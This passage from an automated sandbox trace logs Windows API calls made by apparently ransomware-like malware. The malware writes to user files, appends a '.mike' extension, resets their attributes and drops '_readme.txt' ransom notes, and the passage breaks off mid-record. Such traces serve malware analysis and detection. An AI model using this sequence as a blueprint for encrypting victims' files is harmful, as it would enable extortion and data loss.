(dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0147.216] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0147.216] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0147.217] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\mXervh37EMC5.wav.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\mXervh37EMC5.wav.mike", lpFilePart=0x0) returned 0x46 [0147.217] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0147.218] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0147.218] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0147.218] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0147.220] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\mXervh37EMC5.wav.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\mXervh37EMC5.wav.mike", lpFilePart=0x0) returned 0x46 [0147.220] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0147.220] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0147.221] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0147.221] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0147.222] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\mXervh37EMC5.wav.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\mXervh37EMC5.wav.mike", lpFilePart=0x0) returned 0x46 [0147.223] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0147.223] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0147.223] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0147.224] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0147.225] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\mXervh37EMC5.wav.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\mXervh37EMC5.wav.mike", lpFilePart=0x0) returned 0x46 [0147.225] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0147.225] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0147.226] WriteFile (in: hFile=0x1d4, lpBuffer=0x218be28*, nNumberOfBytesToWrite=0xf80, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x218be28*, lpNumberOfBytesWritten=0x2af074*=0xf80, lpOverlapped=0x0) returned 1 [0147.227] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0147.227] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0147.229] WriteFile (in: hFile=0x1d4, lpBuffer=0x218f050*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x218f050*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0147.229] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\mXervh37EMC5.wav.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\mXervh37EMC5.wav.mike", lpFilePart=0x0) returned 0x46 [0147.229] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0147.230] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0147.230] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\mXervh37EMC5.wav.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\mXervh37EMC5.wav.mike", lpFilePart=0x0) returned 0x46 [0147.230] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0147.231] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0147.231] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\mXervh37EMC5.wav", dwFileAttributes=0x80) returned 1 [0147.233] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0147.233] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0147.234] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\_readme.txt", lpFilePart=0x0) returned 0x3c [0147.234] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af020) returned 1 [0147.235] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af01c) returned 1 [0147.236] WriteFile (in: hFile=0x1d4, lpBuffer=0x2192370*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af0b8, lpOverlapped=0x0 | out: lpBuffer=0x2192370*, lpNumberOfBytesWritten=0x2af0b8*=0x45e, lpOverlapped=0x0) returned 1 [0147.237] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0147.237] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d0) returned 1 [0147.238] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0147.238] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0147.238] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0147.238] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0147.239] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0147.239] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0147.239] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0147.239] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\O xM8JO.odp.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\O xM8JO.odp.mike", lpFilePart=0x0) returned 0x41 [0147.240] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0147.240] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0147.240] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\O xM8JO.odp", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\O xM8JO.odp", lpFilePart=0x0) returned 0x3c [0147.241] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0147.241] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0147.241] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0147.242] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0147.242] WriteFile (in: hFile=0x1d4, lpBuffer=0x2197da0*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x2197da0*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0147.243] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0147.243] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0147.244] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0147.244] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0147.246] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\O xM8JO.odp.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\O xM8JO.odp.mike", lpFilePart=0x0) returned 0x41 [0147.246] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0147.246] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0147.247] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0147.247] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0147.248] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\O xM8JO.odp.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\O xM8JO.odp.mike", lpFilePart=0x0) returned 0x41 [0147.249] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0147.249] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0147.249] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0147.250] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0147.251] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\O xM8JO.odp.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\O xM8JO.odp.mike", lpFilePart=0x0) returned 0x41 [0147.251] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0147.252] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0147.252] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0147.253] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0147.254] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\O xM8JO.odp.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\O xM8JO.odp.mike", lpFilePart=0x0) returned 0x41 [0147.254] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0147.254] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0147.255] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0147.255] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0147.256] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\O xM8JO.odp.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\O xM8JO.odp.mike", lpFilePart=0x0) returned 0x41 [0147.257] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0147.257] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0147.257] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0147.258] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0147.259] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\O xM8JO.odp.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\O xM8JO.odp.mike", lpFilePart=0x0) returned 0x41 [0147.259] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0147.259] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0147.260] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0147.260] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0147.262] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\O xM8JO.odp.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\O xM8JO.odp.mike", lpFilePart=0x0) returned 0x41 [0147.262] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0147.262] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0147.263] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0147.263] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0147.264] WriteFile (in: hFile=0x1d4, lpBuffer=0x21f6044*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x21f6044*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0147.265] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\O xM8JO.odp.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\O xM8JO.odp.mike", lpFilePart=0x0) returned 0x41 [0147.265] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0147.265] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0147.266] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0147.266] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0147.266] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\O xM8JO.odp", dwFileAttributes=0x80) returned 1 [0147.268] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0147.268] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0147.268] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\_readme.txt", lpFilePart=0x0) returned 0x3c [0147.268] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af020) returned 1 [0147.269] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af01c) returned 1 [0147.270] WriteFile (in: hFile=0x1d4, lpBuffer=0x21f92e4*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af0b8, lpOverlapped=0x0 | out: lpBuffer=0x21f92e4*, lpNumberOfBytesWritten=0x2af0b8*=0x45e, lpOverlapped=0x0) returned 1 [0147.271] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0147.271] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d0) returned 1 [0147.271] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0147.272] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0147.272] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0147.272] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0147.272] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0147.273] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0147.273] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0147.273] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\op7stxQJ0.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\op7stxQJ0.jpg.mike", lpFilePart=0x0) returned 0x43 [0147.273] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0147.274] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0147.274] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\op7stxQJ0.jpg", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\op7stxQJ0.jpg", lpFilePart=0x0) returned 0x3e [0147.274] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0147.274] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0147.275] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0147.275] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0147.276] WriteFile (in: hFile=0x1d4, lpBuffer=0x21fcfd0*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x21fcfd0*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0147.277] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0147.277] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0147.277] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0147.278] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0147.279] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\op7stxQJ0.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\op7stxQJ0.jpg.mike", lpFilePart=0x0) returned 0x43 [0147.280] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0147.280] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0147.280] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0147.281] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0147.282] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\op7stxQJ0.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\op7stxQJ0.jpg.mike", lpFilePart=0x0) returned 0x43 [0147.283] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0147.283] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0147.283] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0147.284] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0147.285] WriteFile (in: hFile=0x1d4, lpBuffer=0x221e2e8*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x221e2e8*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0147.285] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\op7stxQJ0.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\op7stxQJ0.jpg.mike", lpFilePart=0x0) returned 0x43 [0147.285] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0147.286] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0147.286] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\op7stxQJ0.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\op7stxQJ0.jpg.mike", lpFilePart=0x0) returned 0x43 [0147.286] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0147.286] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0147.287] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\op7stxQJ0.jpg", dwFileAttributes=0x80) returned 1 [0147.288] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0147.288] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0147.289] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\_readme.txt", lpFilePart=0x0) returned 0x3c [0147.289] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af020) returned 1 [0147.290] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af01c) returned 1 [0147.290] WriteFile (in: hFile=0x1d4, lpBuffer=0x22215c0*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af0b8, lpOverlapped=0x0 | out: lpBuffer=0x22215c0*, lpNumberOfBytesWritten=0x2af0b8*=0x45e, lpOverlapped=0x0) returned 1 [0147.291] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P-ori- rChlL7Nv.avi", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P-ori- rChlL7Nv.avi", lpFilePart=0x0) returned 0x44 [0147.292] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0147.292] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d0) returned 1 [0147.292] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0147.292] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0147.293] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0147.293] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0147.293] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0147.294] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0147.294] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0147.294] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P-ori- rChlL7Nv.avi.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P-ori- rChlL7Nv.avi.mike", lpFilePart=0x0) returned 0x49 [0147.294] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0147.295] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0147.295] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P-ori- rChlL7Nv.avi", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P-ori- rChlL7Nv.avi", lpFilePart=0x0) returned 0x44 [0147.295] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0147.295] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0147.306] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P-ori- rChlL7Nv.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P-ori- rChlL7Nv.avi.mike", lpFilePart=0x0) returned 0x49 [0147.308] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0147.308] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P-ori- rChlL7Nv.avi.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\p-ori- rchll7nv.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.310] GetFileType (hFile=0x1d4) returned 0x1 [0147.311] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0147.311] GetFileType (hFile=0x1d4) returned 0x1 [0147.311] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x0 [0147.311] WriteFile (in: hFile=0x1d4, lpBuffer=0x2224088*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x2224088*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0147.313] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0147.313] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P-ori- rChlL7Nv.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\p-ori- rchll7nv.avi"), fInfoLevelId=0x0, lpFileInformation=0x2223b80 | out: lpFileInformation=0x2223b80*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x55c40ad0, ftCreationTime.dwHighDateTime=0x1d4d578, 